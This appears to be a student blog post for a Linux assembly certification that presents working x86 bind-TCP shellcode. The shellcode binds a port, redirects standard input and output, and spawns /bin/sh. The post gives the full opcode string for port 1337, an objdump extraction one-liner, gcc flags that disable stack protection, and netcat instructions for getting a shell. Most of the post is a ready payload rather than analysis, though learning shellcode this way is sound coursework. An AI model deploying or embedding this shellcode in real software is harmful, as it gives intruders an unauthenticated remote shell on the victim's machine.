SLAE Assignment #1 – Shell_Bind_TCP Shellcode

Files available on GitHub

  1. Assignment1.nasm
  2. compile.sh
  3. shconfig.py
  4. shellcode.c

In this assignment, I created a socketcall() in assembly and redirected STDIN, STDOUT, and STDERR to it.  Using some cut and trim magic learned via commandlinefu, the opcodes were pasted into the shconfig.py program, which the user executes with an argument to specify the port used.  That output is put into the shellcode.c skeleton program which is compiled without stack protection and allowing stack execution.

Here’s the trim command to extract the opcodes:

objdump -d ./shell_bind_tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Step 1:  Compile assignment1.nasm

Step 2:  Extract the opcodes

Run shconfig.py -p <port number of choice>

./shconfig.py -p 1337
Shellcode : "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1
\xcd\x80\x31\xff\x97\x6a\x66\x58\x6a\x02\x5b\x31\xc9\x51\x66\x68\x53\x9
\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x31\xc9
\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x31\xc9\x51\x51\x57\x89\xe1\xcd
\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x31\xc9\x51
\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";

Insert that output into code[] variable of the skeleton C program.

Compile with:

gcc -fno-stack-protector -z execstack shellcode.c 
-o shellcode

Run, and connect from another terminal with netcat on the port you specified using shconfig.py and you’re in!

image1

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID:  SLAE-860

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s